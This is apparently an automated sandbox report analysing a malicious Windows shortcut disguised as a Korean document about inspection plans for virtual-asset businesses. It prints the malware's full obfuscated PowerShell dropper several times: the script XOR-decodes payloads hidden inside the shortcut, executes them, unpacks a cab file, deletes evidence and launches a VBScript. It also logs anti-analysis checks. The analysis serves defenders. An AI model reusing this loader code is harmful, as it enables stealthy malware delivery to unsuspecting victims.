Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	March 10, 2025, 2:48 p.m.	March 10, 2025, 2:48 p.m.

Size	1.1MB
Type	MS Windows shortcut, Has Description string, Has command line arguments, Icon number=0, ctime=Sun Dec 31 15:32:08 1600, mtime=Sun Dec 31 15:32:08 1600, atime=Sun Dec 31 15:32:08 1600, length=0, window=hidenormalshowminimized
MD5	`6467861415139a1ee35f2b036e57c494`
SHA256	`2dcb83b80eef4018e85d56c2e19fd176b2a77042239d730aac055fc74a6aaba9`
CRC32	`676DEB8D`
ssdeep	`3072:gO/rr78+c+8W3nYf+mwNuTEaBX76PDtAtODz0EtlAb14LiP2KZ:57IWKvrX7YDthhtSZWiJ`
Yara	Antivirus - Contains references to security software Lnk_Format_Zero - LNK Format lnk_file_format - Microsoft Windows Shortcut File Format Generic_Malware_Zero - Generic Malware

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "YkhOq" C:\Users\test22\AppData\Local\Temp\가상자산사업자+검사계획민당정회의+발표자료_FN2.hwp.lnk
2536
- cmd.exe "C:\Windows\system32\cmd.exe" /c for /f "tokens=*" %f in ('dir /s /b C:\Windows\System32\WindowsPowershell\*.exe ^| findstr /i rshell.exe') do (if exist "%f" (%f "function stiff{param($attended); <#right distinction#>$management = $attended.substring(0,$attended.length-4) + ''; <#african plaster#>return $management;};function female{param($partly);<#honorable plead#> remove-item <#oppression establish#> -path $partly <#holy incident#> -force;};function twin{param($plane,$extent,$fresh,$profession,$elder);<#sixteenth parish#> $latin=New-Object System.IO.FileStream(<#trust painful#>$plane,<#join apron#>[System.IO.FileMode]::Open,<#spirited tarnish#>[System.IO.FileAccess]::Read);<#pocket cleanse#> $latin.Seek(<#utterly tumultuous#>$extent,[System.IO.SeekOrigin]::Begin);<#prudence ascent#> $hissing=$fresh*0x01;<#seaweed cloister#> $cluster=New-Object byte[] <#infection must#>$fresh; <#check integrity#> $close=New-Object byte[] <#whole recover#>$hissing; <#cherish fond#>$latin.Read(<#above fitting#>$close,0,<#stripe crime#>$hissing); $latin.Close();$think=0;while($think -lt $fresh){<#wreck prosperity#>$cluster[$think]=$close[$think*0x01] -bxor $profession;$think++;}<#conceal moon#> set-content $elder <#wheat scope#> $cluster -Encoding <#acquire pleading#> Byte;};function slowly{param($confusion, $exalt);<#crest undue#> expand $confusion <#surgery headdress#> -F:* $exalt;};function locomotive{$assign = $env:public<#ballast seventy#> + '\' +<#reveal hastily#> 'docu'+'ment'+'s';<#chest bronze#> return $assign;};function vicious{param($station); <#vehemence desirous#>$surround = Split-Path $station;<#palate pine#> return $surround;};function make{return Get-Location;};function overpower{<#compress exercise#>return $env:Temp;};function annoy{$heat = make; $ligature = noisy -aerial $heat; <#explanation subtle#>if($ligature.length -eq 0) {$heat = overpower; <#playing attention#>$ligature = noisy -aerial $heat;} return $ligature;};function riding{$river = $env:public<#studious kind#> + '\' + 'co'+'nti'+'nen'+'t.'+'ca'+'b';<#anthozoa silicon#> return $river;};function enlarged{$introduce = $env:public<#vassal marginal#>+'\doc'+'ume'+'nts\'+'sta'+'rt'+'.v'+'bs';<#danger infect#> return $introduce;};function noisy{param($aerial); <#bowsprit pipe#> $unity=''; [System.IO.Directory]::GetFiles($aerial, '*.'+'lnk', [System.IO.SearchOption]::AllDirectories) | <#covering speed#>ForEach-Object { <#inspect monkey#> $enlarge = [System.IO.FileInfo]::new($_); <#cleavage shears#> if ($enlarge.Length -eq 0x00119A2C) { <#retail file#> $unity = $enlarge.FullName;}}; return <#vowel reply#> $unity;};$undue = annoy;<#posture manifold#>$testify = vicious -station $undue;<#belonging derivative#> $consign = stiff -attended $undue;twin -plane <#being tight#> $undue -extent <#sulphuric reign#> 0x000021A2 -fresh 0x0000B200 -profession <#appendix motive#> 0x2B -elder <#inscription antelope#> $consign;<#cleavage failing#> & $consign;$assault=riding;<#consequence spin#>twin -plane <#beak stop#> $undue -extent <#tunnel violet#> 0x0000D3A2 -fresh <#pointed accuse#> 0x00013CD8 -profession <#salmon effect#> 0x72 -elder <#illustration thorax#> $assault;<#form grasping#>female -partly $undue;$tyrant = locomotive;<#tumbler successive#>slowly -confusion $assault -exalt <#possess carbonate#>$tyrant;<#repeat signify#>female -partly $assault;$tabernacle = <#front imposing#>enlarged;<#restrict head#>& $tabernacle;") )
  2648
  - cmd.exe C:\Windows\system32\cmd.exe /c dir /s /b C:\Windows\System32\WindowsPowershell\*.exe | findstr /i rshell.exe
    2744
    - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" dir /s /b C:\Windows\System32\WindowsPowershell\*.exe "
      2800
    - findstr.exe findstr /i rshell.exe
      2840
  - powershell.exe C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe "function stiff{param($attended); <#right distinction#>$management = $attended.substring(0,$attended.length-4) + ''; <#african plaster#>return $management;};function female{param($partly);<#honorable plead#> remove-item <#oppression establish#> -path $partly <#holy incident#> -force;};function twin{param($plane,$extent,$fresh,$profession,$elder);<#sixteenth parish#> $latin=New-Object System.IO.FileStream(<#trust painful#>$plane,<#join apron#>[System.IO.FileMode]::Open,<#spirited tarnish#>[System.IO.FileAccess]::Read);<#pocket cleanse#> $latin.Seek(<#utterly tumultuous#>$extent,[System.IO.SeekOrigin]::Begin);<#prudence ascent#> $hissing=$fresh*0x01;<#seaweed cloister#> $cluster=New-Object byte[] <#infection must#>$fresh; <#check integrity#> $close=New-Object byte[] <#whole recover#>$hissing; <#cherish fond#>$latin.Read(<#above fitting#>$close,0,<#stripe crime#>$hissing); $latin.Close();$think=0;while($think -lt $fresh){<#wreck prosperity#>$cluster[$think]=$close[$think*0x01] -bxor $profession;$think++;}<#conceal moon#> set-content $elder <#wheat scope#> $cluster -Encoding <#acquire pleading#> Byte;};function slowly{param($confusion, $exalt);<#crest undue#> expand $confusion <#surgery headdress#> -F:* $exalt;};function locomotive{$assign = $env:public<#ballast seventy#> + '\' +<#reveal hastily#> 'docu'+'ment'+'s';<#chest bronze#> return $assign;};function vicious{param($station); <#vehemence desirous#>$surround = Split-Path $station;<#palate pine#> return $surround;};function make{return Get-Location;};function overpower{<#compress exercise#>return $env:Temp;};function annoy{$heat = make; $ligature = noisy -aerial $heat; <#explanation subtle#>if($ligature.length -eq 0) {$heat = overpower; <#playing attention#>$ligature = noisy -aerial $heat;} return $ligature;};function riding{$river = $env:public<#studious kind#> + '\' + 'co'+'nti'+'nen'+'t.'+'ca'+'b';<#anthozoa silicon#> return $river;};function enlarged{$introduce = $env:public<#vassal marginal#>+'\doc'+'ume'+'nts\'+'sta'+'rt'+'.v'+'bs';<#danger infect#> return $introduce;};function noisy{param($aerial); <#bowsprit pipe#> $unity=''; [System.IO.Directory]::GetFiles($aerial, '*.'+'lnk', [System.IO.SearchOption]::AllDirectories) | <#covering speed#>ForEach-Object { <#inspect monkey#> $enlarge = [System.IO.FileInfo]::new($_); <#cleavage shears#> if ($enlarge.Length -eq 0x00119A2C) { <#retail file#> $unity = $enlarge.FullName;}}; return <#vowel reply#> $unity;};$undue = annoy;<#posture manifold#>$testify = vicious -station $undue;<#belonging derivative#> $consign = stiff -attended $undue;twin -plane <#being tight#> $undue -extent <#sulphuric reign#> 0x000021A2 -fresh 0x0000B200 -profession <#appendix motive#> 0x2B -elder <#inscription antelope#> $consign;<#cleavage failing#> & $consign;$assault=riding;<#consequence spin#>twin -plane <#beak stop#> $undue -extent <#tunnel violet#> 0x0000D3A2 -fresh <#pointed accuse#> 0x00013CD8 -profession <#salmon effect#> 0x72 -elder <#illustration thorax#> $assault;<#form grasping#>female -partly $undue;$tyrant = locomotive;<#tumbler successive#>slowly -confusion $assault -exalt <#possess carbonate#>$tyrant;<#repeat signify#>female -partly $assault;$tabernacle = <#front imposing#>enlarged;<#restrict head#>& $tabernacle;"
    2888
    - expand.exe "C:\Windows\system32\expand.exe" C:\Users\Public\continent.cab -F:* C:\Users\Public\documents
      3008

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW March 10, 2025, 2:48 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 10, 2025, 2:48 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 10, 2025, 2:48 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 10, 2025, 2:48 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 10, 2025, 2:48 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 10, 2025, 2:48 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent March 10, 2025, 2:48 p.m.			0	0

Command line console output was observed (50 out of 957 events)

Time & API	Arguments	Status	Return
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: if console_handle: 0x00000007	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: exist "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" console_handle: 0x00000007	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe console_handle: 0x00000007	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: "function stiff{param($attended); <#right distinction#>$management = $attended.substring(0,$attended.length-4) + ''; <#african plaster#>return $management;};function female{param($partly);<#honorable plead#> remove-item <#oppression establish#> -path $partly <#holy incident#> -force;};function twin{param($plane,$extent,$fresh,$profession,$elder);<#sixteenth parish#> $latin=New-Object System.IO.FileStream(<#trust painful#>$plane,<#join apron#>[System.IO.FileMode]::Open,<#spirited tarnish#>[System.IO.FileAccess]::Read);<#pocket cleanse#> $latin.Seek(<#utterly tumultuous#>$extent,[System.IO.SeekOrigin]::Begin);<#prudence ascent#> $hissing=$fresh0x01;<#seaweed cloister#> $cluster=New-Object byte[] <#infection must#>$fresh; <#check integrity#> $close=New-Object byte[] <#whole recover#>$hissing; <#cherish fond#>$latin.Read(<#above fitting#>$close,0,<#stripe crime#>$hissing); $latin.Close();$think=0;while($think -lt $fresh){<#wreck prosperity#>$cluster[$think]=$close[$think0x01] -bxor $profession;$think++;}<#conceal moon#> set-content $elder <#wheat scope#> $cluster -Encoding <#acquire pleading#> Byte;};function slowly{param($confusion, $exalt);<#crest undue#> expand $confusion <#surgery headdress#> -F:* $exalt;};function locomotive{$assign = $env:public<#ballast seventy#> + '\' +<#reveal hastily#> 'docu'+'ment'+'s';<#chest bronze#> return $assign;};function vicious{param($station); <#vehemence desirous#>$surround = Split-Path $station;<#palate pine#> return $surround;};function make{return Get-Location;};function overpower{<#compress exercise#>return $env:Temp;};function annoy{$heat = make; $ligature = noisy -aerial $heat; <#explanation subtle#>if($ligature.length -eq 0) {$heat = overpower; <#playing attention#>$ligature = noisy -aerial $heat;} return $ligature;};function riding{$river = $env:public<#studious kind#> + '\' + 'co'+'nti'+'nen'+'t.'+'ca'+'b';<#anthozoa silicon#> return $river;};function enlarged{$introduce = $env:public<#vassal marginal#>+'\doc'+'ume'+'nts\'+'sta'+'rt'+'.v'+'bs';<#danger infect#> return $introduce;};function noisy{param($aerial); <#bowsprit pipe#> $unity=''; [System.IO.Directory]::GetFiles($aerial, '*.'+'lnk', [System.IO.SearchOption]::AllDirectories) \| <#covering speed#>ForEach-Object { <#inspect monkey#> $enlarge = [System.IO.FileInfo]::new($_); <#cleavage shears#> if ($enlarge.Length -eq 0x00119A2C) { <#retail file#> $unity = $enlarge.FullName;}}; return <#vowel reply#> $unity;};$undue = annoy;<#posture manifold#>$testify = vicious -station $undue;<#belonging derivative#> $consign = stiff -attended $undue;twin -plane <#being tight#> $undue -extent <#sulphuric reign#> 0x000021A2 -fresh 0x0000B200 -profession <#appendix motive#> 0x2B -elder <#inscription antelope#> $consign;<#cleavage failing#> & $consign;$assault=riding;<#consequence spin#>twin -plane <#beak stop#> $undue -extent <#tunnel violet#> 0x0000D3A2 -fresh <#pointed accuse#> 0x00013CD8 -profession <#salmon effect#> 0x72 -elder <#illustration thorax#> $assault;<#form grasping#>female -partly $undue;$tyrant = locomotive;<#tumbler successive#>slowly -confusion $assault -exalt <#possess carbonate#>$tyrant;<#repeat signify#>female -partly $assault;$tabernacle = <#front imposing#>enlarged;<#restrict head#>& $tabernacle;" console_handle: 0x00000007	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: Method invocation failed because [System.IO.FileInfo] doesn't contain a method console_handle: 0x00000023	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: named 'new'. console_handle: 0x0000002f	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: At line:1 char:2308 console_handle: 0x0000003b	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: + function stiff{param($attended); <#right distinction#>$management = $attended console_handle: 0x00000047	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: .substring(0,$attended.length-4) + ''; <#african plaster#>return $management;}; console_handle: 0x00000053	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: function female{param($partly);<#honorable plead#> remove-item <#oppression est console_handle: 0x0000005f	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: ablish#> -path $partly <#holy incident#> -force;};function twin{param($plane,$e console_handle: 0x0000006b	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: xtent,$fresh,$profession,$elder);<#sixteenth parish#> $latin=New-Object System. console_handle: 0x00000077	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: IO.FileStream(<#trust painful#>$plane,<#join apron#>[System.IO.FileMode]::Open, console_handle: 0x00000083	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: <#spirited tarnish#>[System.IO.FileAccess]::Read);<#pocket cleanse#> $latin.See console_handle: 0x0000008f	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: k(<#utterly tumultuous#>$extent,[System.IO.SeekOrigin]::Begin);<#prudence ascen console_handle: 0x0000009b	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: t#> $hissing=$fresh*0x01;<#seaweed cloister#> $cluster=New-Object byte[] <#infe console_handle: 0x000000a7	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: ction must#>$fresh; <#check integrity#> $close=New-Object byte[] <#whole recove console_handle: 0x000000b3	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: r#>$hissing; <#cherish fond#>$latin.Read(<#above fitting#>$close,0,<#stripe cri console_handle: 0x000000bf	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: me#>$hissing); $latin.Close();$think=0;while($think -lt $fresh){<#wreck prosper console_handle: 0x000000cb	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: ity#>$cluster[$think]=$close[$think*0x01] -bxor $profession;$think++;}<#conceal console_handle: 0x000000d7	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: moon#> set-content $elder <#wheat scope#> $cluster -Encoding <#acquire pleadin console_handle: 0x000000e3	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: g#> Byte;};function slowly{param($confusion, $exalt);<#crest undue#> expand $co console_handle: 0x000000ef	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: nfusion <#surgery headdress#> -F:* $exalt;};function locomotive{$assign = $env: console_handle: 0x000000fb	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: public<#ballast seventy#> + '\' +<#reveal hastily#> 'docu'+'ment'+'s';<#chest b console_handle: 0x00000107	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: ronze#> return $assign;};function vicious{param($station); <#vehemence desirous console_handle: 0x00000113	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: #>$surround = Split-Path $station;<#palate pine#> return $surround;};function m console_handle: 0x0000011f	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: ake{return Get-Location;};function overpower{<#compress exercise#>return $env:T console_handle: 0x0000012b	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: emp;};function annoy{$heat = make; $ligature = noisy -aerial $heat; <#explanati console_handle: 0x00000137	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: on subtle#>if($ligature.length -eq 0) {$heat = overpower; <#playing attention#> console_handle: 0x00000143	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: $ligature = noisy -aerial $heat;} return $ligature;};function riding{$river = $ console_handle: 0x0000014f	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: env:public<#studious kind#> + '\' + 'co'+'nti'+'nen'+'t.'+'ca'+'b';<#anthozoa s console_handle: 0x0000015b	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: ilicon#> return $river;};function enlarged{$introduce = $env:public<#vassal mar console_handle: 0x00000167	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: ginal#>+'\doc'+'ume'+'nts\'+'sta'+'rt'+'.v'+'bs';<#danger infect#> return $intr console_handle: 0x00000173	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: oduce;};function noisy{param($aerial); <#bowsprit pipe#> $unity=''; [System.IO. console_handle: 0x0000017f	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: Directory]::GetFiles($aerial, '*.'+'lnk', [System.IO.SearchOption]::AllDirector console_handle: 0x0000018b	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: ies) \| <#covering speed#>ForEach-Object { <#inspect monkey#> $enlarge = [System console_handle: 0x00000197	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: .IO.FileInfo]::new <<<< ($_); <#cleavage shears#> if ($enlarge.Length -eq 0x001 console_handle: 0x000001a3	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: 19A2C) { <#retail file#> $unity = $enlarge.FullName;}}; return <#vowel reply#> console_handle: 0x000001af	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: $unity;};$undue = annoy;<#posture manifold#>$testify = vicious -station $undue; console_handle: 0x000001bb	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: <#belonging derivative#> $consign = stiff -attended $undue;twin -plane <#being console_handle: 0x000001c7	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: tight#> $undue -extent <#sulphuric reign#> 0x000021A2 -fresh 0x0000B200 -profes console_handle: 0x000001d3	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: sion <#appendix motive#> 0x2B -elder <#inscription antelope#> $consign;<#cleava console_handle: 0x000001df	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: ge failing#> & $consign;$assault=riding;<#consequence spin#>twin -plane <#beak console_handle: 0x000001eb	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: stop#> $undue -extent <#tunnel violet#> 0x0000D3A2 -fresh <#pointed accuse#> 0x console_handle: 0x000001f7	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: 00013CD8 -profession <#salmon effect#> 0x72 -elder <#illustration thorax#> $ass console_handle: 0x00000203	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: ault;<#form grasping#>female -partly $undue;$tyrant = locomotive;<#tumbler succ console_handle: 0x0000020f	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: essive#>slowly -confusion $assault -exalt <#possess carbonate#>$tyrant;<#repeat console_handle: 0x0000021b	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: signify#>female -partly $assault;$tabernacle = <#front imposing#>enlarged;<#re console_handle: 0x00000227	1	1
WriteConsoleW March 10, 2025, 2:48 p.m.	buffer: strict head#>& $tabernacle; console_handle: 0x00000233	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 57 events)

Time & API	Arguments	Status	Return
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002556a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00255c20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00255c20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00255c20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002557a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002557a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002557a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002557a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002557a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002557a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00255260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00255260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00255260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00255c20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00255c20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00255c20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00255b20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00255c20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00255c20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00255c20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00255c20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00255c20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00255c20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00255c20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002553a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002553a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002553a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002553a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002553a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002553a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002553a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002553a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002553a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002553a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002553a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002553a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002553a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002553a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00256020 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00256020 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00256020 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00256020 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00256020 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00256020 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00256020 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00256020 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00256020 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00256020 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00256020 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2025, 2:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00256020 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx March 10, 2025, 2:48 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 164 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 1769472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a10000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
